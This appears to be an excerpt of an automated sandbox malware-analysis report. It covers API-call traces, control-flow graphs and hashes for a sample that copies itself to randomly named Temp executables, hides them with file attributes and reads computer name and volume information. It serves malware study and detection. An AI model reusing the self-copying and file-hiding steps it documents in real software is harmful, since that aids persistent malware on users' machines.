                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: File$lstrcatlstrlen$Attributeslstrcpy$CloseCopyCreateExecuteHandleShellSize
                                                                                                                                                                                                                                                      • String ID: .exe$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\takyouhoymc.exe$C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe
                                                                                                                                                                                                                                                      • API String ID: 3499175425-1914881269
                                                                                                                                                                                                                                                      • Opcode ID: 24e34c12a7353faee238a2288893e0d00ab5e7609692cd2730c9dbbfb4d67edc
                                                                                                                                                                                                                                                      • Instruction ID: 841bb2694eb70e705f06205daaf3cb89c723d915824e048fd7700e84ea31da65
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 24e34c12a7353faee238a2288893e0d00ab5e7609692cd2730c9dbbfb4d67edc
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1F318872A04219ABDB20E7A4DC49FD977AC9B54305F5004E7F644E20C1DFB8ABC98F69

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                      control_flow_graph 865 40c6a0-40c6f3 lstrcpyA lstrlenA 866 40c6fa-40c720 call 413663 lstrcatA call 413a97 865->866 871 40c722-40c729 call 401e2a 866->871 872 40c733-40c73a 866->872 876 40c72e-40c731 871->876 872->866 873 40c73c-40c75a lstrcpyA lstrlenA 872->873 875 40c761-40c783 call 413663 lstrcatA call 413a97 873->875 883 40c785-40c794 call 401e2a 875->883 884 40c796-40c79d 875->884 876->872 878 40c7a1-40c7ad lstrcpyA 876->878 880 40c7af-40c7b3 878->880 883->878 883->884 884->875 886 40c79f 884->886 886->880
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\,776AC310,76AF0F10,00000000), ref: 0040C6D2
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 0040C6E1
                                                                                                                                                                                                                                                        • Part of subcall function 00413663: lstrlenA.KERNEL32(4941262305804196,?,?,00000000), ref: 00413691
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,.exe), ref: 0040C70F
                                                                                                                                                                                                                                                        • Part of subcall function 00413A97: GetFileAttributesA.KERNEL32(00000000,0040C71D,00000000), ref: 00413A9B
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(00000000,C:\Windows\system32\), ref: 0040C748
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 0040C751
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,.exe), ref: 0040C772
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe,00000000), ref: 0040C7AD
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: lstrcpylstrlen$lstrcat$AttributesFile
                                                                                                                                                                                                                                                      • String ID: .exe$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe$C:\Windows\system32\
                                                                                                                                                                                                                                                      • API String ID: 3674745152-3356367058
                                                                                                                                                                                                                                                      • Opcode ID: b6df891b65a45cc2a615300a5c9184ea6f316ab2b91bf69aa434291407f973ad
                                                                                                                                                                                                                                                      • Instruction ID: b179360706abfde640a6b66b940e8fe839b2ad012b079806e7e9c2bb175f0aee
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b6df891b65a45cc2a615300a5c9184ea6f316ab2b91bf69aa434291407f973ad
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BD315072D0021DEADF15DBD4DC46AED77BCAB48305F6008ABE604B3181E7B89B859F58

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\,C:\Users\user\AppData\Local\Temp\,00000104,C:\Users\user\AppData\Local\Temp\,?,00000000,0040D80A), ref: 0040C02D
                                                                                                                                                                                                                                                        • Part of subcall function 004136FF: lstrlenA.KERNEL32(4941262305804196,C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\,0040C034,?,00000000,0040D80A), ref: 00413708
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\,-00000006,?,00000000,0040D80A), ref: 0040C042
                                                                                                                                                                                                                                                        • Part of subcall function 00413663: lstrlenA.KERNEL32(4941262305804196,?,?,00000000), ref: 00413691
                                                                                                                                                                                                                                                        • Part of subcall function 00413E36: GetCurrentProcess.KERNEL32(00000008,?,C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\,?,?,?,?,?,76AF0440,0040C052,C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\,00000000,?,00000000,0040D80A), ref: 00413E4B
                                                                                                                                                                                                                                                        • Part of subcall function 00413E36: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,76AF0440,0040C052,C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\,00000000,?,00000000,0040D80A), ref: 00413E52
                                                                                                                                                                                                                                                        • Part of subcall function 00413E36: GetLastError.KERNEL32(?,?,?,?,?,76AF0440,0040C052,C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\,00000000,?,00000000,0040D80A), ref: 00413E5C
                                                                                                                                                                                                                                                      • SetFileAttributesA.KERNEL32(C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\,00000007,?,00000000,0040D80A), ref: 0040C058
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\,0042A3B0,?,00000000,0040D80A), ref: 0040C064
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\mjvsikbqngeunkjyurda\,C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\,?,00000000,0040D80A), ref: 0040C071
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\mjvsikbqngeunkjyurda\,-0000000C,?,00000000,0040D80A), ref: 0040C084
                                                                                                                                                                                                                                                        • Part of subcall function 00413E36: GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000,00000104,?,?,?,?,?,76AF0440,0040C052,C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\,00000000), ref: 00413E75
                                                                                                                                                                                                                                                        • Part of subcall function 00413E36: GetLastError.KERNEL32(?,?,?,?,?,76AF0440,0040C052,C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\,00000000,?,00000000,0040D80A), ref: 00413E81
                                                                                                                                                                                                                                                        • Part of subcall function 00413E36: GetLastError.KERNEL32(?,?,?,?,?,76AF0440,0040C052,C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\,00000000,?,00000000,0040D80A), ref: 00413E88
                                                                                                                                                                                                                                                        • Part of subcall function 00413E36: CloseHandle.KERNEL32(?,?,?,?,?,76AF0440,0040C052,C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\,00000000,?,00000000), ref: 00413F77
                                                                                                                                                                                                                                                        • Part of subcall function 00413E36: SetFileAttributesA.KERNEL32(00000000,00000006,?,?,?,?,76AF0440,0040C052,C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\,00000000,?,00000000), ref: 00413F82
                                                                                                                                                                                                                                                      • SetFileAttributesA.KERNEL32(C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\,00000007,?,?,?,?,00000000,0040D80A), ref: 0040C09A
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\mjvsikbqngeunkjyurda\,0042A3B0,?,?,?,?,00000000,0040D80A), ref: 0040C0A6
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: lstrlen$AttributesErrorFileLast$ProcessTokenlstrcatlstrcpy$CloseCurrentHandleInformationOpen
                                                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\$C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\mjvsikbqngeunkjyurda\
                                                                                                                                                                                                                                                      • API String ID: 1705690235-91685041
                                                                                                                                                                                                                                                      • Opcode ID: a22528a4bd3f7e1b7169bd5d19fea0fd725bc73e28345ff0d74c62af98b68780
                                                                                                                                                                                                                                                      • Instruction ID: d73920bf5ce4dfd11cd3351f73f73b1dc2511ad9cee57e00e81c4fc8d553fe06
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a22528a4bd3f7e1b7169bd5d19fea0fd725bc73e28345ff0d74c62af98b68780
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CE0184B3B4121073C1213B21AC8BFBF3A1D9F82726F04402AFD0595142CF5C566A46BF

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetComputerNameA.KERNEL32(?,?), ref: 0040C0F4
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(4941262305804196,?), ref: 0040C104
                                                                                                                                                                                                                                                      • GetVolumeInformationA.KERNEL32(0040DB1D,00000000,00000000,00000063,00000000,00000000,00000000,00000000), ref: 0040C136
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(4941262305804196,?), ref: 0040C152
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ComputerInformationNameVolumelstrcatlstrcpy
                                                                                                                                                                                                                                                      • String ID: 2$4941262305804196$C:\Windows\system32\$c
                                                                                                                                                                                                                                                      • API String ID: 96996548-2816264590
                                                                                                                                                                                                                                                      • Opcode ID: d84cf7e1718c1e54ac5a1dacb7e25b78403c8476962d3321682ff539aece8d81
                                                                                                                                                                                                                                                      • Instruction ID: 22708223c646a178d41bc95d92e2a0f814173ae4769f9c09350c61bb9050823e
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d84cf7e1718c1e54ac5a1dacb7e25b78403c8476962d3321682ff539aece8d81
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 90114F72A4121CBFDB01DBE8DC85EEEBBBCFB18344F140466F600E6041DB745A198B65

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                      control_flow_graph 934 40d09a-40d0b6 lstrlenA 935 40d154-40d157 934->935 936 40d0bc-40d0f5 lstrcpyA lstrlenA 934->936 937 40d0f7-40d0fb 936->937 938 40d0fe-40d104 936->938 937->938 939 40d10b-40d151 call 413663 lstrcatA SetFileAttributesA call 413bcf SetFileAttributesA 938->939 944 40d153 939->944 944->935
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe,00000000,00000000), ref: 0040D0B1
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(00000000,0040D1D5,776AC310), ref: 0040D0DB
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 0040D0E8
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,.exe), ref: 0040D11C
                                                                                                                                                                                                                                                      • SetFileAttributesA.KERNEL32(00000000,00000080), ref: 0040D12E
                                                                                                                                                                                                                                                      • SetFileAttributesA.KERNEL32(00000000,00000007), ref: 0040D148
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: AttributesFilelstrlen$lstrcatlstrcpy
                                                                                                                                                                                                                                                      • String ID: .exe$C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe
                                                                                                                                                                                                                                                      • API String ID: 1691315094-628786359
                                                                                                                                                                                                                                                      • Opcode ID: 495355920ec7953673e0eef587f14138d5ede02e4b128155301275f2b9f1aee0
                                                                                                                                                                                                                                                      • Instruction ID: bba8a6c5f5bab5744c0c80198fd7e287e6b0401e6d4ca0dbf8b47a0fecc87264
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 495355920ec7953673e0eef587f14138d5ede02e4b128155301275f2b9f1aee0
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D211E972904218EAEB209B94DC45BDD77ACDB05314F1044A6E940E7182D7F86BD98FA5

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                      control_flow_graph 945 413bcf-413be6 call 41382b 948 413be8-413bea 945->948 949 413bef-413c2d call 410bf4 CreateFileA 945->949 950 413cc2-413cc4 948->950 953 413c9a 949->953 954 413c2f-413c44 CreateFileA 949->954 955 413c9d-413ca6 953->955 954->955 956 413c46 954->956 957 413ca8-413cab CloseHandle 955->957 958 413cad-413caf 955->958 959 413c4c-413c55 956->959 957->958 960 413cb1-413cb2 CloseHandle 958->960 961 413cb4-413cc1 call 410c3b 958->961 962 413c57-413c5c 959->962 963 413c5e-413c62 959->963 960->961 961->950 964 413c65-413c6f ReadFile 962->964 963->964 964->955 966 413c71-413c85 WriteFile 964->966 966->955 968 413c87-413c8d 966->968 968->955 969 413c8f-413c92 968->969 969->959 970 413c94-413c98 969->970 970->955
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 0041382B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,76AF3520,00000000,00413BDE,?,C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe), ref: 00413843
                                                                                                                                                                                                                                                        • Part of subcall function 0041382B: GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0040D13D,C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe,00000000), ref: 0041384D
                                                                                                                                                                                                                                                        • Part of subcall function 0041382B: CloseHandle.KERNEL32(00000000,?,?,?,?,0040D13D,C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe,00000000), ref: 00413856
                                                                                                                                                                                                                                                      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,76AF3520,00000000,C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe,?,?,?,?,0040D13D,C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe), ref: 00413C25
                                                                                                                                                                                                                                                      • CreateFileA.KERNEL32(0040D13D,40000000,00000000,00000000,00000004,00000080,00000000,?,?,?,?,0040D13D,C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe,00000000), ref: 00413C3D
                                                                                                                                                                                                                                                      • ReadFile.KERNEL32(?,?,0040D13D,?,00000000,?,?,?,?,0040D13D,C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe,00000000), ref: 00413C6B
                                                                                                                                                                                                                                                      • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,0040D13D,C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe,00000000), ref: 00413C7D
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,0040D13D,C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe,00000000), ref: 00413CAB
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,0040D13D,C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe,00000000), ref: 00413CB2
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe, xrefs: 00413BD5
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: File$CloseCreateHandle$ReadSizeWrite
                                                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe
                                                                                                                                                                                                                                                      • API String ID: 1842372638-2091069259
                                                                                                                                                                                                                                                      • Opcode ID: c1c920c90bf58fdbc3e8cb355cb3d56a9521444a16e49114f34270d3f8be6db9
                                                                                                                                                                                                                                                      • Instruction ID: 8831f88d7733d5c323c613fc166e52a429560689813e7087c96eeecf3537979f
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c1c920c90bf58fdbc3e8cb355cb3d56a9521444a16e49114f34270d3f8be6db9
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0C31AD72D00209BFDF119FA5CC84AEFBB78EB04355F10406AF510B2290E7345A92CBA8
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 0040D09A: lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe,00000000,00000000), ref: 0040D0B1
                                                                                                                                                                                                                                                        • Part of subcall function 0040D09A: lstrcpyA.KERNEL32(00000000,0040D1D5,776AC310), ref: 0040D0DB
                                                                                                                                                                                                                                                        • Part of subcall function 0040D09A: lstrlenA.KERNEL32(00000000), ref: 0040D0E8
                                                                                                                                                                                                                                                        • Part of subcall function 0040D09A: lstrcatA.KERNEL32(00000000,.exe), ref: 0040D11C
                                                                                                                                                                                                                                                        • Part of subcall function 0040D09A: SetFileAttributesA.KERNEL32(00000000,00000080), ref: 0040D12E
                                                                                                                                                                                                                                                        • Part of subcall function 0040D09A: SetFileAttributesA.KERNEL32(00000000,00000007), ref: 0040D148
                                                                                                                                                                                                                                                      • GetWindowsDirectoryA.KERNEL32(?,C:\Windows\system32\), ref: 0040D18B
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 0040D19C
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(0000005C,0042A3B0), ref: 0040D1B8
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: lstrlen$AttributesFilelstrcat$DirectoryWindowslstrcpy
                                                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\$C:\Windows\system32\$\
                                                                                                                                                                                                                                                      • API String ID: 2968102200-2806058128
                                                                                                                                                                                                                                                      • Opcode ID: 2ed7aec3453b3e2aff95835a4acf487c9ae87da3e95239a0db27f53eae31b2c8
                                                                                                                                                                                                                                                      • Instruction ID: 7a1d7f8a24643269cf3a04ab3bcaf447689481d6c68f54a33154304281eb3d5c
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2ed7aec3453b3e2aff95835a4acf487c9ae87da3e95239a0db27f53eae31b2c8
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 52F04471E083086ADB2097E09D0ABD677A85B14309F5404BAE9C5F11C5DEBC95CD8A19
                                                                                                                                                                                                                                                      APIs
